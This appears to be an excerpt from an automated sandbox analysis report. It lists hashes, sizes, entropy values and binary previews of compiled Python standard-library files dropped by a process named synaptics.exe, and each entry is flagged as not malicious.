                                                                                                                                                                                                                SSDEEP:192:/hb0oiDyslc6Yc5JJ0kMzr1z37oItrg2spGuDbTM0tNWCEZC:/hGDLlTYc5JJ5Itr5spLbo0bdEZC
                                                                                                                                                                                                                MD5:8FCE05D14601D47E7882E7B9450193F1
                                                                                                                                                                                                                SHA1:A7CEA5F8DA812F14206E75C61E9DB267F386D89C
                                                                                                                                                                                                                SHA-256:14A455EDCDCFCB701ED62C8D8468E5363A501DBBBCBDAACD60F84F8F18EED825
                                                                                                                                                                                                                SHA-512:22BE7F59EC53DE29127EE83DB2218A09549B4825CB71FFAD2C1E91191CE83F72C091E41C4F73605410DDA6B9F262FA8919DC089D15BBE74DFB6FE291D404771C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.A.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.a.d.a.d%d&..Z.d'd(..Z.d)d*..Z d+d,..d-d...Z!d/d0..Z"e.j#d1k.Z$d6d2d3..Z%d4d5..Z&d.S.)7a....Common operations on Posix pathnames...Instead of importing this module directly, import os and refer to.this module as os.path. The "os.path" name is an alias for this.module on Posix systems; on other systems (e.g. Windows),.os.path provides the same operations in a manner specific to that.platform, and is an alias to another module (e.g. ntpath)...Some of this can actually be useful on non-Posix systems too, e.g..for manipulation of the pathname component of URLs.........../..:z./bin:/usr/binNz./dev/null.....)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirname..commonprefix..getsize..getmtime..getatime..getctime..islink..exis
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10802
                                                                                                                                                                                                                Entropy (8bit):5.077625791934223
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:3u+pM4/fRWdufeC/PBbEy6LWf1eR/i9Z6/cWyfmrAX/I8:++pMQQdufd/PBbEy6LWdeo9s/PyfmrCP
                                                                                                                                                                                                                MD5:E749ACC7227D5006C3637910FA652873
                                                                                                                                                                                                                SHA1:F198A7A7116120DD768E3C35E778CDE3ACE315BE
                                                                                                                                                                                                                SHA-256:07D3BEF7EA4EAAC8F291192353131290DEFE19AAA0191956ACB139B1B02CF306
                                                                                                                                                                                                                SHA-512:F1E98B33A89AD42E13BEB26258C168321C757DA57797189B86B8BDB7CF67482B990008485C66C432B935232F7B0B039F3FD049BC06E07B5069BCFFDC146B613B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y1......d.Z.Y.n.w.g.d...Z.z.d.d.l.m.Z...W.n...e.yO......G.d.d...d.e...Z.Y.n.w.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.u.r~e.Z.d.S.d.S.).z'A multi-producer, multi-consumer queue......N)...deque)...heappush..heappop)...monotonic)...SimpleQueue)...Empty..Full..Queue..PriorityQueue..LifoQueuer....).r....c....................@........e.Z.d.Z.d.Z.d.S.).r....z4Exception raised by Queue.get(block=0)/get_nowait().N....__name__..__module__..__qualname__..__doc__..r....r.....&C:\Users\user\Desktop\tmp\lib\queue.pyr...................r....c....................@...r....).r....z4Exception raised by Queue.put(block=0)/put_nowait().Nr....r....r....r....r....r........r....r....c....................@...s....e.Z.d.Z.d.Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d"d.d...Z.d"d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.e.e
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5804
                                                                                                                                                                                                                Entropy (8bit):5.448878972565236
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:u/Pp0xXxswv10Ex2XWFP0nf5nizGJFNYTBTO7u10IbJJs5WkbtL4FRJpGyd/8tzs:kqrswv2RGmxMGb+rIWkOFldkS
                                                                                                                                                                                                                MD5:60320469B2AD043197FD2AE019C271A9
                                                                                                                                                                                                                SHA1:563BFB70093F40CC056AE52BCEB81AFDF0C4973B
                                                                                                                                                                                                                SHA-256:4478B5333EDB52E1771FED12E9B225663EDBD4054A907F196A39566C99750290
                                                                                                                                                                                                                SHA-512:97BAF321199ADCCF297C80869D13603B0EFCE1A70103F4A41422F2A08FE0F373AE28D5B7AD6855B140E004022574648E0619681E6C1C9A9B655DDC86CB422736
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dV........................@...s....d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.z.d.d.l.m.Z.m.Z...W.n...e.y%......d.Z.d.Z.Y.n.w.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.k.rWe.....d.S.d.S.).zHConversions to/from quoted-printable transport encoding as per RFC 1521.)...encode..decode..encodestring..decodestring.....=.L...s....0123456789ABCDEF..........)...a2b_qp..b2a_qpNc....................C...sH...t.|.t...s.J...|.d.v.r.|.S.|.d.k.r.|.S.|.t.k.p#d.|.....k.o d.k.n.......S.).z.Decide whether a particular byte ordinal needs to be quoted... The 'quotetabs' flag indicates whether embedded tabs and spaces should be. quoted. Note that line-ending tabs and spaces are always encoded, as per. RFC 1521.. ..... ......_..... .....~)...isinstance..bytes..ESCAPE)...c..quotetabs..header..r.....'C:\Users\user\Desktop\tmp\lib\quopri.py..needsquoting....s..............".r....c....................C...sB...t.|.t...r.t.|...d.k.s.J...t.|...}.t.t.t.|.d.....t.|.d..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):22758
                                                                                                                                                                                                                Entropy (8bit):5.436071337391863
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:U151Eqqa1XrwieniMSkFVjhfFKoTWGtCX2v1b2+/ngCbWQhkcqHVG:UzJ7KniKTZCX25/1bWbcaVG
                                                                                                                                                                                                                MD5:703759A68285DB5E603BD2BF2E106A98
                                                                                                                                                                                                                SHA1:2C5151AA12E7FD1A42416DD0289F58A96D08300F
                                                                                                                                                                                                                SHA-256:CD56587B5E99E6E9E08ADAC51A4FC332FE5EC323993790BC7DA89583A32CA1D1
                                                                                                                                                                                                                SHA-512:7B3F55E374F99A1765C753F4971943393852BD7D0081A14BA6CD439AF4508691A5CE060C2623BC2A8357D244397739A69DEF84444585306CF8B18267B81DB256
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dg........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z"m#Z$..d.d.l%m&Z'..d.d.l(m)Z*m+Z,..d.d.l-m-Z...d.d.l.Z/d.d.l0Z0z.d.d.l1m2Z1..W.n...e3ym......d.d.l4m2Z1..Y.n.w.g.d...Z5d.e.d.....e.d.....Z6e.d...Z7d.e.d.....Z8d.Z9d.e9....Z:d.Z;G.d.d...d.e0j<..Z<G.d.d...d.e<..Z=e<..Z>e>j?Z?e>j@Z@e>jAZAe>jBZBe>jCZCe>jDZDe>jEZEe>jFZFe>jGZGe>jHZHe>jIZIe>jJZJe>jKZKe>jLZLe>jMZMe>jNZNe>jOZOe>jPZPe>jQZQe>jRZRe>jSZSe>jTZTe>jUZUd.d...ZVd#d.d...ZWeXe/d ..r.e/jYe>j?d!....eZd"k...r.eW....d.S.d.S.)$a....Random variable generators... bytes. -----. uniform bytes (values between 0 and 255).. integers. --------. uniform within range.. sequences. ---------. pick random element. pick random sample. pick weighted random sample. generate random permutation.. distributions on the real line:. ------------------------------. unifor
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):14237
                                                                                                                                                                                                                Entropy (8bit):5.210432951815364
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:AuPJsiNrHyo92OkRFvMKUryx95qoxSrMbZ:ACJssrSoMfRAry/5qoUrMbZ
                                                                                                                                                                                                                MD5:381645B2A4ACBBC6BD1BEC4D9AB1E972
                                                                                                                                                                                                                SHA1:D1DC7C644A1F32E43E943BB82D34D0C7230BAC62
                                                                                                                                                                                                                SHA-256:3989D71DD0BEB3F518A447CCF0ECF5FF01EB87774CE96459C73D8567904A8D05
                                                                                                                                                                                                                SHA-512:848A819D3218B28D5DD95542866BBC32DD0E884D3070EA409680F3C02FE940A35684EB717A7E32AE2D36BF918A7F30092BF5F56C94EA0EABD71BE0FB1C2CC029
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-ds?.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y#......d.Z.Y.n.w.g.d...Z.d.Z.G.d.d...d.e.j...Z.e.....e.j.....e.j.Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d1d.d...Z.d1d.d...Z.d1d.d...Z.d0d.d...Z.d0d.d...Z.d0d.d...Z.d.d...Z.d0d.d...Z.d.d...d.D...Z.d d!..Z.e.e...d"d.....Z.e.e...d"d.....d"....Z.i.Z.d#Z d$d%..Z!e.."e ..d&d'....Z#d(d)..Z$d*d+..Z%d.d.l&Z&d,d-..Z'e&.(e.e'e!....G.d.d/..d/..Z)d.S.)2a....Support for regular expressions (RE)...This module provides regular expression matching operations similar to.those found in Perl. It supports both 8-bit and Unicode strings; both.the pattern and the strings being processed can contain null bytes and.characters outside the US ASCII range...Regular expressions can contain both special and ordinary characters..Most ordinary characters, like "A", "a", or "0", are the simplest.regular expressions; they simply match themselves. You can.concatenate ordinary characters, so last matches the string 'last'...Th
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5260
                                                                                                                                                                                                                Entropy (8bit):5.0199977350973
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:HdnTWdWclUgN2VsfA2IywpvIyeyiGtJAlKgN0A7Hb:BeDk52elTicNWN
                                                                                                                                                                                                                MD5:06C2F0DAA29CCF1B040284CC1AA97726
                                                                                                                                                                                                                SHA1:D133174B4D332153E81D4E405C9167E9DF5BF97F
                                                                                                                                                                                                                SHA-256:A281D90E562924961A111AE2B811D10E022368414C0CFFC68883A1BB77D72204
                                                                                                                                                                                                                SHA-512:826D352B7198B7E9BED13E574DFE703A3A0B5EFE8F54E2BB715C5C35B9D42912A8E6556ABB0A3588CD2AB38C118F6A0CA804AD73145AB79B8873BF1AF9805D0C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d4........................@...s\...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.d...Z.G.d.d...d...Z.d.d...Z.e...Z.e.j.Z.d.S.).zGRedo the builtin repr() (representation) but with limits on most sizes.)...Repr..repr..recursive_repr.....N)...islice)...get_ident.....c........................s......f.d.d...}.|.S.).zGDecorator to make a repr function return fillvalue for a recursive callc........................sX...t...........f.d.d...}.t...d...|._.t...d...|._.t...d...|._.t...d...|._.t...d.i...|._.|.S.).Nc........................sJ...t.|...t...f.}.|...v.r...S.....|.....z...|...}.W.....|.....|.S.....|.....w...N)...idr......add..discard)...self..key..result)...fillvalue..repr_running..user_function...(C:\Users\user\Desktop\tmp\lib\reprlib.py..wrapper....s......................z<recursive_repr.<locals>.decorating_function.<locals>.wrapper..__module__..__doc__..__name__..__qualname__..__annotations__)...set..getattrr....r....r....r....r....).r....r......r....).r....r....r......dec
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17115
                                                                                                                                                                                                                Entropy (8bit):5.179831568774363
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ujg7Dm/9rSzUEok/L1xzQ8DdIE67SQSUQGJbvRkE4wSvceC:ujg7Dm/9rSzzBdIn7SQSkbvRkE4FvceC
                                                                                                                                                                                                                MD5:73C814DAA4FE294B90C1052C22539754
                                                                                                                                                                                                                SHA1:3FAB946ECFD4B8E19458787B3AED8123E53E65D5
                                                                                                                                                                                                                SHA-256:4519F8BC587C721F27865B4838341B9A37EF36D3A07FB9973A8BDFD4D5B60E36
                                                                                                                                                                                                                SHA-512:12CD158FEDF0BCCA72A2AD27B8710B2900D0F3867D5482BFD2A528FABCE93C74B16B25BA9CA1AF0294A9E8BBEC7C54D8BF11B0762A2D89C42CEE6934A7E8314F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.N.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.d...Z.e.d.g.d.....Z.d.e._.e.j.d.k.rId.e.j._.d.e.j._.d.e.j._.d.e.j._.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...r.G.d.d...d.e...Z.e.e.d ..r.G.d!d"..d"e...Z.e.e.d#..r.G.d$d%..d%e...Z.e.e.d&..r.G.d'd(..d(e...Z.d)d*..Z.e.d&..r.e.Z.d.S.e.d ..r.e.Z.d.S.e.d#..r.e.Z.d.S.e.d...r.e.Z.d.S.e.Z.d.S.)+z|Selectors module...This module allows high-level and efficient I/O multiplexing, built upon the.`select` module primitives.......)...ABCMeta..abstractmethod)...namedtuple)...MappingN..........c....................C...s`...t.|.t...r.|.}.n.z.t.|.......}.W.n...t.t.t.f.y"......t.d...|.....d...w.|.d.k.r.t.d...|.......|.S.).z.Return a file descriptor from a file object... Parameters:. fileobj -- file object or file descriptor.. Returns:. corresponding file descriptor.. Raises:. ValueError if the object is invalid. z.I
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7792
                                                                                                                                                                                                                Entropy (8bit):5.50879804333097
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:hQrdt23n7zQxhSaL09FKXY5nzg9gn1yiEWE5cnPr+vP:Grs/b9FKo5zg9g1yLZ6PQ
                                                                                                                                                                                                                MD5:AC3A4ED5C309CF95EB9E8F61ECA3BE58
                                                                                                                                                                                                                SHA1:219D4B5BD85E19E24300BB502CBFCB84B7BF8091
                                                                                                                                                                                                                SHA-256:2BBD461758E10903ABA49A15356B400DAA16C16E1DD422C43B574279163D24DE
                                                                                                                                                                                                                SHA-512:7E5D8E4B183416F59B28160DAC19794E9688147CDCDD7647A98ECA23D9C5F18A0CAFEAFE990425EC716C0BED92483D28838C00AFC65528B489014CA922B19220
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.6.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.e...d.e.j...j.Z.d.d...Z.d.d...Z.e.d.k.rse.e.j...d.k.rPe.e.......d.S.e.j.d...Z.e.e.....Z.e.e.e.e.......W.d.........d.S.1.slw.......Y...d.S.d.S.)..8A lexical analyzer class for simple shell-like syntaxes......N)...deque)...StringIO)...shlex..split..quote..joinc....................@...sv...e.Z.d.Z.d.Z.....d.d.d...Z.e.d.d.....Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).r....r....NFc....................C...s....t.|.t...r.t.|...}.|.d.u.r.|.|._.|.|._.n.t.j.|._.d.|._.|.|._.|.r$d.|._.n.d.|._.d.|._.d.|._.|.j.r7|...j.d.7..._.d.|._.d.|._.d.|._.d.|._.d.|._.d.|._.t...|._.d.|._.d.|._.d.|._.t...|._.d.|._.|.sbd.}.n.|.d.u.rhd.}.|.|._.|.r.t...|._.|...j.d.7..._.|.j...t...|.....}.|.j...|...|._.d.S.d.S.).N....#Z?abcdfeghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_u|..............................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):38371
                                                                                                                                                                                                                Entropy (8bit):5.529033355249105
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:+6Q3EThEID61k7Ai7h3M/cjAgTPgtyQZuYTqGMjQ0olo4txZ:+6Q3EGIeL+rTPgtyQZuYTqGMjQno4tz
                                                                                                                                                                                                                MD5:1EE688D42989CFCD3551B2403E9FE48E
                                                                                                                                                                                                                SHA1:4BE4DC39082250B244D9826C4702646028279D7D
                                                                                                                                                                                                                SHA-256:7A9E6342BA21B0E5E25E74744D368CFC7B3CD878ADD8537EF7AE508F866D9610
                                                                                                                                                                                                                SHA-512:33FE07AB607561D2EFA2859E906A74C6167765DEB5A306D1CAC9F9AA95186CCAD4C0414DC14EF16A1882544D50D2A2BA2F0322C68115F4E9960B0B938C4B0024
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s"...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.[.d.Z.W.n...e.y.......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yC......d.Z.Y.n.w.z.d.d.l.Z.[.d.Z.W.n...e.yX......d.Z.Y.n.w.e.j.d.k.Z.d...Z.Z.e.j.d.k.rld.d.l.Z.n.e.rrd.d.l.Z.e.rvd.n.d.Z.e.e.d...o.e.j...d...a.e.o.e.e.d...Z.d.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"d.d...Z#d.d...Z$e.f.d d!..Z%d.d"d#..Z&d$d%..Z'd&d'..Z(d(d)..Z)d.d*..d+d,..Z*d.d*..d-d...Z+e.e.d/....r.d.d*..d0d1..Z,n.d2d1..Z,d.d*..d3d4..Z-d.d*..d5d6..Z.d.d*..d7d8..Z/d9d:..Z0..d.d;d<..Z1d.d.e/d.d.f.d=d>..Z2e.e.j3d?....r@d@dA..Z4dBdC..Z5n.dDdA..Z4dEdC..Z5dFdG..Z6dHdI..Z7e.j8e.j.e.j9e.j:h.e.j;k...oje.j<e.j=v...oje.j.e.j>v.Z?d.dJdK..Z@e?e@_AdLdM..ZBe/f.dNdO..ZCdPdQ..ZDdRdS..ZEdTdU..ZFdVdW..ZG....d.dYdZ..ZH....d.d[d\..ZId]eHd^g.d_d.f.i.ZJe...r.eHd`g.dad.f.eJdb<.eIg.dcd.f.eJdd<.e...r.eHdeg.dfd.f.eJdg<.e...r.eHdhg.did.f.eJdj<.dkdl..ZKd.dndo..ZLdpdq..ZM
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17390
                                                                                                                                                                                                                Entropy (8bit):5.508621650873683
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:AlpwTn42l1QP47TUN1PirJtKA5y15/Jgt1nmKQ1ruVhY2lrD9bIhx/xAUu2n8/X1:PL42lug7TA1Pi9cA015hgt1nmlUvvlrx
                                                                                                                                                                                                                MD5:4C0B080B4B96B4847254CB5F7B9F56F9
                                                                                                                                                                                                                SHA1:83E118FF6691D5DD2E5A9C393E45DE21C0596065
                                                                                                                                                                                                                SHA-256:02AC9B3CE1098B271F55FB75DB47D26C58A9F3BF64885287FE4BCBEF626E57CD
                                                                                                                                                                                                                SHA-512:BE643AADBC98248BE424BD853A75E9EE212D204D26DA0C70E680A93E9F451A2EA794A61B59D7F111B46854F13C23318B26DDBD392ECB33824093E5911A7CDC21
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.j.g.a.d.a.d.a.d.a.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d4d.d...Z.d4d.d ..Z.d!d"..Z.d#d$..Z.d%d&..Z.d'd(..Z.d)d*..Z.d+d,..Z d-d...Z!d/d0..Z"e.j#j$s.e"....d1d2..Z%e&d3k.r.e%....d.S.d.S.)5a....Append module search paths for third-party packages to sys.path...****************************************************************.* This module is automatically imported during initialization. *.****************************************************************..This will append site-specific paths to the module search path. On.Unix (including Mac OSX), it starts with sys.prefix and.sys.exec_prefix (if different) and appends.lib/python<version>/site-packages..On other platforms (such as Windows), it tries each of the.prefixes directly, as well as with lib/site-packages appended. The.resulting directories, if they exist, are appended to
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):28973
                                                                                                                                                                                                                Entropy (8bit):5.5354647636929935
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:rtwxl9l/P/XkfxdTtaMThmWwflMCMd94IeM044ZNOLe3:rOxDpQXFhtml894IeM05nOy3
                                                                                                                                                                                                                MD5:69FD32FD3BD566E3279B905BF5F5D6AE
                                                                                                                                                                                                                SHA1:74292A816A6B89B635C4FD486A560B37EEF334A3
                                                                                                                                                                                                                SHA-256:7C9B8FA3D8715E293E2BFA27BEF7B7321AC9D7B2F599854B32F82456E14EAF44
                                                                                                                                                                                                                SHA-512:E05EEB9FC30B1D80104C0599D9D2C497D623EC0002E47B03CAB067767FC7FB44A53715A365AF27D028958D41D6EE1707155D340403B3592497D53C9B06D44E11
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dq........................@...sT...d.Z.d.d.l.Z.d.d.l.T.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...z.d.d.l.Z.W.n...e.y3......d.Z.Y.n.w.e.e.d.d...Z.e.e.d.d...Z.e.e.d.d...Z.g.d...Z.e...e...e.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......e...d.e.d.d.......d.Z.d.Z.d.d...Z.e.j.......d.....r.i.Z.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d <.d!e.d"<.d#e.d$<.d%e.d&<.d'e.d(<.d)e.d*<.d+e.d,<.d-e.d.<.d/e.d0<.d1e.d2<.d3e.d4<.d5e.d6<.d7e.d8<.d9e.d:<.d;e.d<<.d=e.d><.d?e.d@<.dAe.dB<.dCe.dD<.dEe.dF<.dGe.dH<.dIe.dJ<.dKe.dL<.dMe.dN<.dOe.dP<.dQe.dR<.dSe.dT<.dUe.dV<.dWe.dX<.dYe.dZ<.d[e.d\<.d]e.d^<.d_e.d`<.dae.db<.dce.dd<.dee.df<.dge.dh<.die.dj<.dke.dl<.dme.dn<.doe.dp<.dqe.dr<.dse.dt<.due.dv<.dwe.dx<.dye.dz<.d{e.d|<.d}e.d~<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15204
                                                                                                                                                                                                                Entropy (8bit):5.607355572452462
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:A3z34fmVm0PVclj2zdkbUzI0MXwcXBzE8yQwo39V753Mqud6LnT:A3nV8j8KAzh2G8pwoNv3Mr6LnT
                                                                                                                                                                                                                MD5:DE30A41D03BA523CA9C9F1E6D4491079
                                                                                                                                                                                                                SHA1:087DA0506D819BC8FCB874C83DE391409101FB7E
                                                                                                                                                                                                                SHA-256:5638BCFA74F14A7AF971B0558FE917E0917C20E4E2EDA0BA34368F2AD6EC813A
                                                                                                                                                                                                                SHA-512:5DB088EF2239CB1EC4ACAB063CAB16B686BD078F5DEACBDA073F3371A6C1AF17416BF68077D22DA4928A381C0752915BF45FF220A2879C5384969CF5623BD225
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dmp.......................@...s$...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.e.j.e.k.s.J.d.....e.e.h.Z.e.e.e.h.Z.e.e.h.Z.e.e.h.Z.e.e.e.h.B.Z.d.Z.d.d...e.D...Z.e.j.f.d.d...Z.d.d...Z.d.d...Z.d-d.d...Z.e.j.d...Z.d.e.>.d...Z.d.Z.e.e f.d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%d.d...Z&d.d ..Z'd!d"..Z(d#d$..Z)d%d&..Z*d'd(..Z+d)d*..Z,d.d+d,..Z-d.S.)/z.Internal support module for sre.....N)...*z.SRE module mismatch).)..i...i1...)..s...i....).....i....).iE...i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i....i....).i2...i....).i4...i....).i>...i....).iA...i....).iB...i....i....).iJ...i....).ic...i....).i....iK...).ia...i....).i....i....c........................s....i.|.].}.|.D.].....t...f.d.d...|.D.......q.q.S.).c....................3...s......|.].}...|.k.r.|.V...q.d.S...N..)....0..j....ir.....,C:\Users\user\Desktop\tmp\lib\sre_compile.py..<genexpr>N...s........z.<dictcomp>.<genexpr>)...tuple).r......tr....r....r......<dictco
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6367
                                                                                                                                                                                                                Entropy (8bit):5.774346162960133
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:C7jrG4iQ2AaI2Ym98qQBI1I1dadE1ff7l17mwvYhaSEZ84C:CM9vIdNfT6E8
                                                                                                                                                                                                                MD5:633B598462860CBE14EEABEFB1368C81
                                                                                                                                                                                                                SHA1:AE5291FF73D8E61AD9D575365C271BD996B36D81
                                                                                                                                                                                                                SHA-256:4563D3BFC306DFB399BA6BF42799426E4D1AAD849506A9DE77C04D67D4538283
                                                                                                                                                                                                                SHA-512:5AA44784A3585A4EC76D231DA4440EF1349001788D7BCE180D462345502DA9160BB374BBB0CD2D47F3CD47AD853AF32138B782663C5B0B43BF43D5990194934E
                                                                                                                                                                                                                Malicious:false
